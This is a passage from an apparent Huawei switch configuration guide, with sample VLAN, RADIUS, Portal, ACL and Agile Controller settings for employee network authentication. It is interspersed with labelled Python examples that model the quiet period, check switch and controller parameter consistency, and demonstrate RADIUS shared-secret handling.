Post-authentication domain | R&D employees: code library, issue tracking system, and Internet. Marketing employees: Internet | -

Configuration Roadmap
1. Configure the access switch and aggregation switch to ensure network connectivity.
2. Configure Portal authentication on the aggregation switch to implement user access
control. Configure parameters for connecting to the RADIUS server and those for
connecting to the Portal server, enable Portal authentication, and configure network
access rights for the pre-authentication domain and post-authentication domain.
3. Configure the Agile Controller:
a. Log in to the Agile Controller.
b. Add user accounts to the Agile Controller.
c. Add a switch to the Agile Controller and configure related parameters to ensure
normal communication between the Agile Controller and switch.
d. Add authorization results and authorization rules to grant different access rights to
R&D employees and marketing employees after they are successfully authenticated.


Procedure
Step 1 Configure the access switch to ensure network connectivity.
The following provides the configuration for SwitchA, the access switch connecting to the
R&D department. The configuration for SwitchB, the access switch connecting to the
marketing department, is similar.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan 101
[SwitchA-vlan101] quit
[SwitchA] interface gigabitethernet 0/0/1 //Interface connected to the R&D department
[SwitchA-GigabitEthernet0/0/1] port link-type access
[SwitchA-GigabitEthernet0/0/1] port default vlan 101
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2 //Interface connected to the aggregation switch
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 101
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] quit
<SwitchA> save //Save the configuration.

Step 2 Configure the aggregation switch.


1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] dhcp enable //Enable the DHCP service.
[SwitchC] vlan batch 101 to 103
[SwitchC] interface gigabitethernet 1/0/1 //Interface connected to the access switch of the R&D department
[SwitchC-GigabitEthernet1/0/1] port link-type trunk
[SwitchC-GigabitEthernet1/0/1] port trunk pvid vlan 101
[SwitchC-GigabitEthernet1/0/1] port trunk allow-pass vlan 101
[SwitchC-GigabitEthernet1/0/1] quit
[SwitchC] interface vlanif 101
[SwitchC-Vlanif101] ip address 192.168.0.1 255.255.255.0 //IP address segment assigned to R&D employees
[SwitchC-Vlanif101] dhcp select interface
[SwitchC-Vlanif101] dhcp server dns-list 172.16.1.2
[SwitchC-Vlanif101] quit
[SwitchC] interface gigabitethernet 1/0/2 //Interface connected to the access switch of the marketing department
[SwitchC-GigabitEthernet1/0/2] port link-type trunk
[SwitchC-GigabitEthernet1/0/2] port trunk pvid vlan 102
[SwitchC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102
[SwitchC-GigabitEthernet1/0/2] quit
[SwitchC] interface vlanif 102
[SwitchC-Vlanif102] ip address 192.168.1.1 255.255.255.0 //IP address segment assigned to marketing employees
[SwitchC-Vlanif102] dhcp select interface
[SwitchC-Vlanif102] dhcp server dns-list 172.16.1.2
[SwitchC-Vlanif102] quit
[SwitchC] interface gigabitethernet 1/0/3 //Interface connected to the server area
[SwitchC-GigabitEthernet1/0/3] port link-type access
[SwitchC-GigabitEthernet1/0/3] port default vlan 103
[SwitchC-GigabitEthernet1/0/3] quit
[SwitchC] interface vlanif 103
[SwitchC-Vlanif103] ip address 172.16.1.254 255.255.255.0 //Configure the gateway address for the server area.
[SwitchC-Vlanif103] quit
[SwitchC] quit
<SwitchC> save //Save the configuration.


2. Configure parameters for connecting to the RADIUS server.


<SwitchC> system-view
[SwitchC] radius-server template policy //Create the RADIUS server template policy.
[SwitchC-radius-policy] radius-server authentication 172.16.1.1 1812 source ip-address 172.16.1.254 //Configure the IP address and port number of the RADIUS authentication server.
[SwitchC-radius-policy] radius-server accounting 172.16.1.1 1813 source ip-address 172.16.1.254 //Configure the IP address and port number of the RADIUS accounting server.
[SwitchC-radius-policy] radius-server shared-key cipher Admin@123 //Set the authentication key and accounting key to Admin@123.
[SwitchC-radius-policy] quit
[SwitchC] aaa //Enter the AAA view.
[SwitchC-aaa] authentication-scheme auth //Configure the authentication scheme auth.
[SwitchC-aaa-authen-auth] authentication-mode radius //Set the authentication mode to RADIUS.
[SwitchC-aaa-authen-auth] quit
[SwitchC-aaa] accounting-scheme acco //Configure the accounting scheme acco.
[SwitchC-aaa-accounting-acco] accounting-mode radius //Set the accounting mode to RADIUS.
[SwitchC-aaa-accounting-acco] accounting realtime 15 //Set the real-time accounting interval to 15 minutes.
[SwitchC-aaa-accounting-acco] quit
[SwitchC-aaa] domain portal //Configure a domain.
[SwitchC-aaa-domain-portal] authentication-scheme auth //Bind the authentication scheme auth to the domain.
[SwitchC-aaa-domain-portal] accounting-scheme acco //Bind the accounting scheme acco to the domain.
[SwitchC-aaa-domain-portal] radius-server policy //Bind the RADIUS server template policy to the domain.
[SwitchC-aaa-domain-portal] quit
[SwitchC-aaa] quit
[SwitchC] domain portal //Configure portal as the global default domain.

3. Configure parameters for connecting to the Portal server.


[SwitchC] web-auth-server portal_huawei //Configure the Portal server template portal_huawei.
[SwitchC-web-auth-server-portal_huawei] server-ip 172.16.1.1 //Set the Portal server IP address.
[SwitchC-web-auth-server-portal_huawei] source-ip 172.16.1.254 //Set the IP address that the switch uses to communicate with the Portal server.
[SwitchC-web-auth-server-portal_huawei] port 50200 //Set the destination port number in the packets that the switch sends to the Portal server to 50200, which is the same as the port number that the Portal server uses to receive packets. The default destination port number on the switch is 50100, and you must change it to 50200 manually, so that it matches the port number on the Portal server.
[SwitchC-web-auth-server-portal_huawei] shared-key cipher Admin@123 //Configure the shared key for communication with the Portal server, which must be the same as that configured on the Portal server.
[SwitchC-web-auth-server-portal_huawei] url http://access.example.com:8080/portal //Configure the URL for the Portal authentication page, in which access.example.com indicates the host name of the Portal server. The domain name is recommended in the URL so that the Portal authentication page can be pushed to users faster and more securely. To use the domain name in the URL, you must configure the mapping between this domain name access.example.com and the Portal server IP address on the DNS server in advance.
[SwitchC-web-auth-server-portal_huawei] quit
[SwitchC] web-auth-server listening-port 2000 //Configure the port number that the switch uses to process Portal protocol packets. The default port number is 2000. If the port number is changed on the server, change it accordingly on the switch.
[SwitchC] portal quiet-period //Enable the quiet function for Portal authentication users. If the number of times that a Portal authentication user fails to be authenticated within 60 seconds exceeds the specified value, the device discards the user's Portal authentication request packets for a period to prevent impact of frequent authentication failures on the system.
[SwitchC] portal quiet-times 5 //Configure the maximum number of authentication failures within 60 seconds before the device quiets a Portal authentication user.
[SwitchC] portal timer quiet-period 240 //Set the quiet period to 240 seconds.
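The quiet function configured by the three portal commands above is easy to misread (is the sixth or the fifth failure the one that triggers it, and does the window slide?). The following model, an added example and not Huawei code, simulates the behaviour the comments describe: failures are counted in a 60-second window, a user whose failures exceed quiet-times (5) is quieted for quiet-period (240) seconds, and requests during that time are discarded rather than forwarded for authentication. The class, method and account names are assumptions made for this illustration; only the numbers 5, 60 and 240 come from the configuration.

```python
"""Model of the Portal quiet-period behaviour configured in Step 2.3.

Added example, not Huawei code.  It simulates the documented rule: a user who
fails Portal authentication more than `quiet_times` times within a 60-second
window is quieted for `quiet_period` seconds, and the device discards that
user's authentication requests until the quiet period expires.  The values
5 and 240 come from the configuration above; class, method and user names
are this example's own assumptions.
"""
from collections import defaultdict, deque


class PortalQuietPeriod:
    WINDOW = 60  # failures are counted within a 60-second window (documented)

    def __init__(self, quiet_times=5, quiet_period=240):
        self.quiet_times = quiet_times        # portal quiet-times 5
        self.quiet_period = quiet_period      # portal timer quiet-period 240
        self._failures = defaultdict(deque)   # user -> timestamps of recent failures
        self._quiet_until = {}                # user -> time at which quiet ends

    def is_quiet(self, user, now):
        """True while the user's authentication requests are being discarded."""
        until = self._quiet_until.get(user)
        if until is None:
            return False
        if now < until:
            return True
        del self._quiet_until[user]           # quiet period has expired
        return False

    def record_failure(self, user, now):
        """Count a failed attempt; return True if this failure quiets the user."""
        recent = self._failures[user]
        recent.append(now)
        while recent and now - recent[0] >= self.WINDOW:
            recent.popleft()                  # forget failures outside the window
        if len(recent) > self.quiet_times:    # "exceeds the specified value"
            self._quiet_until[user] = now + self.quiet_period
            recent.clear()
            return True
        return False

    def handle_request(self, user, now, credentials_ok):
        """Outcome of one Portal authentication request: accepted, rejected or discarded."""
        if self.is_quiet(user, now):
            return "discarded"                # dropped by the switch, no RADIUS exchange
        if credentials_ok:
            self._failures[user].clear()
            return "accepted"
        self.record_failure(user, now)
        return "rejected"


def simulate():
    """Constructed scenario: six wrong passwords in six seconds, then a correct
    one during the quiet period, then a correct one after it expires."""
    qp = PortalQuietPeriod(quiet_times=5, quiet_period=240)
    results = [qp.handle_request("A-123", t, False) for t in range(6)]
    results.append(qp.handle_request("A-123", 20, True))       # still quiet
    results.append(qp.handle_request("A-123", 5 + 240, True))  # quiet expired
    return results


if __name__ == "__main__":
    print(simulate())
```

The model shows why the quiet period is worth enabling at an aggregation-layer authentication point: without it, every wrong password costs a RADIUS round trip to the Agile Controller, and a terminal looping on a bad credential keeps that load up indefinitely.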

4. Enable Portal authentication.


[SwitchC] authentication unified-mode //Set the NAC mode to unified. By default, the unified mode is enabled. After the NAC mode is changed, save the configuration and restart the device to make the configuration take effect.
[SwitchC] interface vlanif 101
[SwitchC-Vlanif101] authentication portal //Enable Portal authentication on the interface.
[SwitchC-Vlanif101] web-auth-server portal_huawei direct //Bind the Portal server template to the interface, so the interface can control user access to the enterprise network. If user terminals and the switch are connected through a Layer 2 network, set the Portal authentication mode to direct. If user terminals and the switch are connected through a Layer 3 network, set the Portal authentication mode to layer3.
[SwitchC-Vlanif101] quit
[SwitchC] interface vlanif 102
[SwitchC-Vlanif102] authentication portal //Enable Portal authentication on the interface connecting to the marketing department.
[SwitchC-Vlanif102] web-auth-server portal_huawei direct //Bind the Portal server template to the interface, so the interface can control user access to the enterprise network. If user terminals and the switch are connected through a Layer 2 network, set the Portal authentication mode to direct. If user terminals and the switch are connected through a Layer 3 network, set the Portal authentication mode to layer3.
[SwitchC-Vlanif102] quit

5. Configure network access rights for the pre-authentication domain and post-
authentication domain.
[SwitchC] authentication free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255 //Configure an authentication-free rule for Portal authentication users, so that these users can access the DNS server before the authentication.
[SwitchC] authentication free-rule 2 destination ip 172.16.1.3 mask 255.255.255.255 //Configure an authentication-free rule for Portal authentication users, so that these users can access the web server before the authentication.
[SwitchC] acl 3001 //Configure the post-authentication domain for R&D employees.
[SwitchC-acl-adv-3001] rule 1 permit ip //Allow R&D employees to access all resources.
[SwitchC-acl-adv-3001] quit
[SwitchC] acl 3002 //Configure the post-authentication domain for marketing employees.
[SwitchC-acl-adv-3002] rule 1 deny ip destination 172.16.1.4 0 //Prevent marketing employees from accessing the code library.
[SwitchC-acl-adv-3002] rule 2 deny ip destination 172.16.1.5 0 //Prevent marketing employees from accessing the issue tracking system.
[SwitchC-acl-adv-3002] rule 3 permit ip //Allow marketing employees to access other resources.
[SwitchC-acl-adv-3002] quit
[SwitchC] quit
<SwitchC> save //Save the configuration.

Step 3 Configure the Agile Controller.


1. Log in to the Agile Controller.
a. Open the Internet Explorer, enter the Agile Controller address in the address box,
and press Enter.
The following table provides two types of Agile Controller addresses.


Address Format | Description
https://Agile Controller-IP:8443 | In the address, Agile Controller-IP indicates the Agile Controller IP address.
Agile Controller IP address | If port 80 is enabled during installation, you can access the Agile Controller by simply entering its IP address without the port number. The Agile Controller address will automatically change to https://Agile Controller-IP:8443.

b. Enter the administrator account and password.


If you log in to the Agile Controller for the first time, use the super administrator
account admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create departments and accounts. The following describes how to create the R&D
department. Create the Marketing department similarly.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right. Then click Add under
the Department tab, and add the department R&D.

c. Click the User tab in the operation area on the right. Then click Add under the User
tab, and add the user A.


d. Click in the Operation column on the right of user A. The Account Management page is displayed. Click Add, and create a common account A-123 with the password Huawei123.


e. On the User tab page, select user A and click Transfer to add user A to the R&D
department.


3. Add a switch to the Agile Controller and configure related parameters to ensure normal
communication between the Agile Controller and switch.
a. Choose Resource > Device > Device Management.
b. Click Add.
c. Configure parameters for the switch.
Parameter | Value | Description
Name | SW | -
IP Address | 172.16.1.254 | The interface must be able to communicate with the SC.
Device series | Huawei Quidway Series | -
Authentication Key | Admin@123 | It must be the same as the shared key of the RADIUS authentication server configured on the switch.
Charging Key | Admin@123 | It must be the same as the shared key of the RADIUS accounting server configured on the switch.
Real-time charging interval (minute) | 15 | It must be the same as the real-time accounting interval configured on the switch.
Port | 2000 | This is the port that the switch uses to communicate with the Portal server. Retain the default value.
Portal Key | Admin@123 | It must be the same as the Portal shared key configured on the switch.
Allowed IP Addresses | 192.168.0.1/24; 192.168.1.1/24 | -


d. Click OK.
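Almost every row of the device table above carries the same requirement: the value must equal what was typed on the switch in Step 2, and the page points out that the switch defaults (destination port 50100, listening port 2000) are not all what the Agile Controller expects. The following checker, an added example and not Huawei or Agile Controller code, pulls those values out of a constructed excerpt of the Step 2 commands (using the plaintext keys the procedure types in, since a saved configuration file shows only cipher text) and compares them with the device parameters from the table; the dictionary keys and function names are this example's own.

```python
"""Cross-check of the switch-side RADIUS/Portal parameters against the device
parameters entered on the Agile Controller (the table in Step 3.3).

Added example, not Huawei code.  SWITCH_CONFIG is a constructed excerpt of the
commands from Step 2 (with the plaintext keys the procedure types in, whereas a
saved configuration file shows only cipher text); CONTROLLER_DEVICE mirrors the
controller table.  Dictionary keys and function names are this example's own.
"""
import ipaddress
import re

SWITCH_CONFIG = """\
radius-server template policy
 radius-server shared-key cipher Admin@123
 radius-server authentication 172.16.1.1 1812 source ip-address 172.16.1.254
 radius-server accounting 172.16.1.1 1813 source ip-address 172.16.1.254
aaa
 accounting-scheme acco
  accounting realtime 15
web-auth-server portal_huawei
 server-ip 172.16.1.1
 port 50200
 shared-key cipher Admin@123
 source-ip 172.16.1.254
web-auth-server listening-port 2000
interface Vlanif101
 ip address 192.168.0.1 255.255.255.0
interface Vlanif102
 ip address 192.168.1.1 255.255.255.0
"""

CONTROLLER_DEVICE = {  # values from the "Configure parameters for the switch" table
    "ip_address": "172.16.1.254",
    "authentication_key": "Admin@123",
    "charging_key": "Admin@123",
    "realtime_charging_interval": 15,
    "port": 2000,                  # port the switch uses to talk to the Portal server
    "portal_key": "Admin@123",
    "portal_receive_port": 50200,  # port the Portal server listens on (service data plan)
    "authentication_port": 1812,
    "accounting_port": 1813,
    "allowed_ip_addresses": ["192.168.0.1/24", "192.168.1.1/24"],
}


def parse_switch(config):
    """Extract the values that must agree with the controller from CLI text."""
    def grab(pattern, cast=str):
        m = re.search(pattern, config, re.M)
        return cast(m.group(1)) if m else None

    return {
        "radius_key": grab(r"^\s*radius-server shared-key cipher (\S+)"),
        "auth_port": grab(r"^\s*radius-server authentication \S+ (\d+)", int),
        "acct_port": grab(r"^\s*radius-server accounting \S+ (\d+)", int),
        "realtime": grab(r"^\s*accounting realtime (\d+)", int),
        "source_ip": grab(r"^\s*source-ip (\S+)"),
        "portal_key": grab(r"^\s*shared-key cipher (\S+)"),
        # Documented switch defaults apply when the command is absent: 50100 and 2000.
        "portal_port": grab(r"^\s*port (\d+)", int) or 50100,
        "listening_port": grab(r"^\s*web-auth-server listening-port (\d+)", int) or 2000,
        "user_subnets": [ipaddress.ip_interface(f"{ip}/{mask}").network
                         for ip, mask in re.findall(r"^\s*ip address (\S+) (\S+)", config, re.M)],
    }


def check_consistency(switch, controller):
    """Return (check name, ok) pairs; every one must hold before users can authenticate."""
    allowed = {ipaddress.ip_interface(a).network for a in controller["allowed_ip_addresses"]}
    return [
        ("device IP equals switch source-ip",
         controller["ip_address"] == switch["source_ip"]),
        ("authentication key equals RADIUS shared key",
         controller["authentication_key"] == switch["radius_key"]),
        ("charging key equals RADIUS shared key",
         controller["charging_key"] == switch["radius_key"]),
        ("real-time charging interval equals accounting realtime",
         controller["realtime_charging_interval"] == switch["realtime"]),
        ("controller port equals switch listening port",
         controller["port"] == switch["listening_port"]),
        ("Portal key equals web-auth-server shared key",
         controller["portal_key"] == switch["portal_key"]),
        ("Portal receive port equals web-auth-server port",
         controller["portal_receive_port"] == switch["portal_port"]),
        ("authentication port equals", controller["authentication_port"] == switch["auth_port"]),
        ("accounting port equals", controller["accounting_port"] == switch["acct_port"]),
        ("allowed IP addresses cover the user subnets",
         all(net in allowed for net in switch["user_subnets"])),
    ]


def mismatches(config=SWITCH_CONFIG, controller=CONTROLLER_DEVICE):
    """Names of the checks that fail; an empty list means the two sides agree."""
    return [name for name, ok in check_consistency(parse_switch(config), controller) if not ok]


if __name__ == "__main__":
    print(mismatches() or "switch and Agile Controller parameters agree")
```

Dropping the `port 50200` line from the excerpt makes the checker report the Portal receive-port mismatch the page warns about, while dropping `web-auth-server listening-port 2000` reports nothing, because that default already matches the controller's value.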
4. Configure employee authorization. This example describes how to configure R&D
employee authorization. The configuration procedure for marketing employees is the
same, except that the network resources the two types of employees can access are
different.
a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result, and configure resources that R&D employees can access
after authentication and authorization.

Parameter                   Value                                     Description
Name                        R&D employee post-authentication domain   -
Service Type                Access Service                            -
ACL Number/AAA User Group   3001                                      The ACL number must be the same as the number of the ACL configured for R&D employees on the switch.


b. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule, and specify the authorization conditions for R&D employees.
Parameter              Value                                     Description
Name                   R&D employee authorization rule           -
Service Type           Access User                               -
Department             R&D                                       -
Authorization Result   R&D employee post-authentication domain   -


Step 4 Verify the configuration.


l Employees can access only the Agile Controller, DNS, and web servers before
authentication.
l The Portal authentication page is pushed to an employee when the employee attempts to
visit an Internet website. After the employee enters the correct account and password, the
requested web page is displayed.
l R&D employee A can access the Internet, code library, and issue tracking system after
authentication. Marketing employee B can access the Internet but not the code library
and issue tracking system after authentication.


l After an employee is authenticated, run the display access-user command on the switch.
The command output shows that the employee is online.

----End

Switch Configuration File


# Configuration file of the access switch for the R&D department
#
sysname SwitchA
#
vlan batch 101
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 101
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
return

# Configuration file of the access switch for the marketing department


#
sysname SwitchB
#
vlan batch 102
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 102
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 102
#
return

# Configuration file of the aggregation switch


#
sysname SwitchC
#
vlan batch 101 to 103
#
domain portal
#
dhcp enable
#
radius-server template policy
radius-server shared-key cipher %#%#lJIB8CQ<:A;x$h2V5+;+C>HwC+@XAL)ldpQI}:$X%#%#
radius-server authentication 172.16.1.1 1812 source ip-address 172.16.1.254 weight 80
radius-server accounting 172.16.1.1 1813 source ip-address 172.16.1.254 weight 80
#
acl number 3001
rule 1 permit ip
acl number 3002
rule 1 deny ip destination 172.16.1.4 0
rule 2 deny ip destination 172.16.1.5 0
rule 3 permit ip
#
web-auth-server portal_huawei
server-ip 172.16.1.1
port 50200
shared-key cipher %#%#q9a^<=Ct5'=0n40/1g}/m6Mo,U9u5!s(GYM}Z{<~%#%#
url http://access.example.com:8080/portal

source-ip 172.16.1.254
#
aaa
authentication-scheme auth
authentication-mode radius
accounting-scheme acco
accounting-mode radius
accounting realtime 15
domain portal
authentication-scheme auth
accounting-scheme acco
radius-server policy
#
interface Vlanif101
ip address 192.168.0.1 255.255.255.0
web-auth-server portal_huawei direct
authentication portal
dhcp select interface
dhcp server dns-list 172.16.1.2
#
interface Vlanif102
ip address 192.168.1.1 255.255.255.0
web-auth-server portal_huawei direct
authentication portal
dhcp select interface
dhcp server dns-list 172.16.1.2
#
interface Vlanif103
ip address 172.16.1.254 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk pvid vlan 101
port trunk allow-pass vlan 101
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk pvid vlan 102
port trunk allow-pass vlan 102
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 103
#
authentication free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255
authentication free-rule 2 destination ip 172.16.1.3 mask 255.255.255.255
portal quiet-period
portal timer quiet-period 240
portal quiet-times 5
#
return

10.5.3 Example for Configuring 802.1x and MAC Address Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Access Switch)
Overview
802.1x authentication and MAC address authentication are two methods used for Network
Admission Control (NAC). 802.1x authentication is implemented based on interfaces, and
MAC address authentication is implemented based on interfaces and MAC addresses. Both
methods protect the security of enterprise networks.
802.1x authentication is more secure than MAC address authentication; however, it requires
that 802.1x client software be installed on all user terminals, which reduces networking
flexibility. 802.1x authentication is applicable to networks that require high information
security.
MAC address authentication does not need 802.1x client software, but user terminals' MAC
addresses must be registered on the authentication server, so network configuration and
management are complex. MAC address authentication is applicable to dumb terminals such as
printers and fax machines.

Configuration Notes
l This example applies to all S12700 versions.
l NOTE: To know details about software mappings, see Version Mapping Search for Huawei Campus
Switches.
l Huawei's Agile Controller in V100R001C00 functions as the RADIUS server in this
example. For the Agile Controller, the minimum version required is V100R001C00.
l The RADIUS authentication and accounting shared keys and Portal shared key on the
switch must be the same as those on the Agile Controller server.
l By default, the switch allows packets from the RADIUS server to pass. You do not need
to configure authentication-free rules for the server on the switch.
l If NAC authentication is enabled on an interface, the following commands cannot be
used on the same interface.

Command                             Function
mac-limit                           Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable        Disables MAC address learning on an interface.
port link-type dot1q-tunnel         Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan     Configures VLAN mapping on an interface.
port vlan-mapping vlan inner-vlan
port vlan-stacking                  Configures selective QinQ.
port-security enable                Enables interface security.
mac-vlan enable                     Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable               Enables IP subnet-based VLAN assignment on an interface.
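The note above that the RADIUS shared keys on the switch and the Agile Controller must match is worth seeing in protocol terms. The following Python is an added example, not Huawei's code: it implements the RFC 2865 User-Password hiding and Response Authenticator with this example's key Huawei@2014 and account A-123/Huawei123, and shows what happens when the server holds a different key (the mismatched key Huawei@2015 is constructed). The MD5-based hiding is the only protection the RFC gives the password on the wire, which is why the key should be long and unique per device.

```python
"""RADIUS shared-secret mechanics (RFC 2865). Added example, not Huawei code.
Key Huawei@2014 and account A-123 / Huawei123 come from this section's data
plan; the mismatched server key used in the demo is constructed."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2


def hide_password(secret: bytes, req_auth: bytes, password: bytes) -> bytes:
    """NAS side: pad the password to 16-byte blocks and XOR each block with
    MD5(secret + previous cipher block), seeded with the Request Authenticator."""
    if len(req_auth) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += prev
    return out


def reveal_password(secret: bytes, req_auth: bytes, hidden: bytes) -> bytes:
    """Server side: undo hide_password. A wrong secret yields a wrong keystream,
    so the recovered password is garbage and authentication fails."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(hidden[i:i + 16], keystream))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def encode_attrs(attrs) -> bytes:
    """Attributes are TLVs: type (1 byte), length including header (1 byte), value."""
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)


def parse_attrs(body: bytes):
    attrs = []
    while body:
        if len(body) < 2 or body[1] < 2 or body[1] > len(body):
            raise ValueError("malformed attribute")
        attrs.append((body[0], body[2:body[1]]))
        body = body[body[1]:]
    return attrs


def build_packet(code: int, ident: int, authenticator: bytes, attrs) -> bytes:
    body = encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body


def build_response(code: int, ident: int, attrs, req_auth: bytes, secret: bytes) -> bytes:
    """Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    body = encode_attrs(attrs)
    header = struct.pack("!BBH", code, ident, 20 + len(body))
    return header + hashlib.md5(header + req_auth + body + secret).digest() + body


def verify_response(packet: bytes, req_auth: bytes, secret: bytes) -> bool:
    """NAS side: trust a reply only if its authenticator recomputes under the
    NAS's own secret; a reply built with a mismatched key fails here."""
    if len(packet) < 20 or struct.unpack("!H", packet[2:4])[0] != len(packet):
        return False
    expected = hashlib.md5(packet[:4] + req_auth + packet[20:] + secret).digest()
    return hmac.compare_digest(expected, packet[4:20])


def run_exchange(nas_secret: bytes, server_secret: bytes,
                 username: bytes, password: bytes) -> dict:
    """One Access-Request / reply round trip. The server has the same account
    password on file; returns what it recovered, its decision, and whether the
    NAS accepts the reply."""
    req_auth = os.urandom(16)
    request = build_packet(ACCESS_REQUEST, 7, req_auth, [
        (ATTR_USER_NAME, username),
        (ATTR_USER_PASSWORD, hide_password(nas_secret, req_auth, password)),
    ])
    # Server: parse the request and recover the password with its own secret.
    attrs = dict(parse_attrs(request[20:]))
    seen = reveal_password(server_secret, request[4:20], attrs[ATTR_USER_PASSWORD])
    code = ACCESS_ACCEPT if seen == password else ACCESS_REJECT
    reply = build_response(code, request[1], [], request[4:20], server_secret)
    return {"password_seen_by_server": seen, "server_code": code,
            "reply_verified": verify_response(reply, req_auth, nas_secret)}


if __name__ == "__main__":
    for server_key in (b"Huawei@2014", b"Huawei@2015"):  # second key is constructed
        print(server_key, run_exchange(b"Huawei@2014", server_key, b"A-123", b"Huawei123"))
```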

Networking Requirements
Enterprises have high requirements on network security. To prevent unauthorized access and
protect information security, an enterprise requires users to pass identity authentication and
a security check before they access the enterprise network. Only authorized users are allowed to
access the enterprise network.


In addition, dumb terminals, such as IP phones and printers, can access the enterprise network
only after passing authentication.

The enterprise network has the following characteristics:

l All access switches support 802.1x authentication.
l The enterprise network is small and has no branch networks.
l The enterprise has no more than 1000 employees. A maximum of 2000 users, including
guests, access the network every day.
l Dumb terminals, such as IP phones and printers, are connected to the enterprise network.

To provide high security for the network, you are advised to configure the 802.1x
authentication function on access switches and connect a single centralized authentication
server to the aggregation switch in bypass mode. MAC address authentication needs to be
configured for dumb terminals.

Figure 10-37 Wired access networking diagram

[Figure: pre-authentication domain: Agile Controller (RADIUS and Portal), 192.168.100.100; post-authentication domain: service server (key network resources), 192.168.102.100. Core layer with campus egress to the Internet. Aggregation layer: SwitchA, upstream interfaces GE0/0/5 and GE0/0/6, downstream interfaces GE0/0/1 and GE0/0/2. Access layer: SwitchC and SwitchD (authentication points), each with uplink GE0/0/3, a fixed terminal on GE0/0/1 and a dumb terminal on GE0/0/2. Legend: 802.1X authentication packets; MAC authentication packets.]

Data Plan

Table 10-9 Network data plan

Item                                Data
Agile Controller                    IP address: 192.168.100.100
Post-authentication domain server   IP address: 192.168.102.100
Aggregation switch (SwitchA)        Management IP address: 192.168.10.10
Access switch (SwitchC)             User VLAN ID: 10; management IP address: 192.168.30.30
Access switch (SwitchD)             User VLAN ID: 20; management IP address: 192.168.40.40

Table 10-10 Access switch service data plan

Item                                           Data
RADIUS scheme
    l Authentication server IP address: 192.168.100.100
    l Authentication server port number: 1812
    l Accounting server IP address: 192.168.100.100
    l Accounting server port number: 1813
    l Shared key for the RADIUS server: Huawei@2014
    l Accounting interval: 15 minutes
    l Authentication domain: isp
ACL number of the post-authentication domain   3002

Table 10-11 Agile Controller service data plan

Item                        Data
Department                  R&D department
Access user                 User name: A; wired access account: A-123; password: Huawei123
Device group                Wired device group: Switch
Switch IP address           SwitchC: 192.168.30.30; SwitchD: 192.168.40.40
RADIUS authentication key   Huawei@2014
RADIUS accounting key       Huawei@2014


Configuration Roadmap
1. Configure the access switches, including the VLANs that interfaces belong to, parameters for
connecting to the RADIUS server, enabling NAC authentication, and access rights to the
post-authentication domain.
NOTE: Ensure that routes are reachable between the access switches (SwitchC and SwitchD), the aggregation switch
(SwitchA), and the Agile Controller server.
2. Configure the Agile Controller:
a. Log in to the Agile Controller.
b. Add an account to the Agile Controller.
c. Add switches to the Agile Controller.
d. Configure authentication rules, authorization results, and authorization rules on the
Agile Controller.

Procedure
Step 1 Configure the access switches. This example uses SwitchC to describe the configuration. The
domain configuration on SwitchD is the same as that on SwitchC.
1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] vlan batch 10
[SwitchC] interface gigabitethernet 0/0/1 //Configure the interface connected to fixed terminals.
[SwitchC-GigabitEthernet0/0/1] port link-type access
[SwitchC-GigabitEthernet0/0/1] port default vlan 10
[SwitchC-GigabitEthernet0/0/1] quit
[SwitchC] interface gigabitethernet 0/0/2 //Configure the interface connected to dumb terminals.
[SwitchC-GigabitEthernet0/0/2] port link-type access
[SwitchC-GigabitEthernet0/0/2] port default vlan 10
[SwitchC-GigabitEthernet0/0/2] quit
[SwitchC] interface gigabitethernet 0/0/3 //Configure the interface connected to SwitchA.
[SwitchC-GigabitEthernet0/0/3] port link-type trunk
[SwitchC-GigabitEthernet0/0/3] port trunk allow-pass vlan 10
[SwitchC-GigabitEthernet0/0/3] quit
[SwitchC] interface vlanif 10
[SwitchC-Vlanif10] ip address 192.168.30.30 24 //Configure the IP address used to communicate with the Controller.

2. Create and configure a RADIUS server template, an AAA authentication scheme, and an
authentication domain.

# Create and configure the RADIUS server template rd1.
[SwitchC] radius-server template rd1
[SwitchC-radius-rd1] radius-server authentication 192.168.100.100 1812
[SwitchC-radius-rd1] radius-server accounting 192.168.100.100 1813
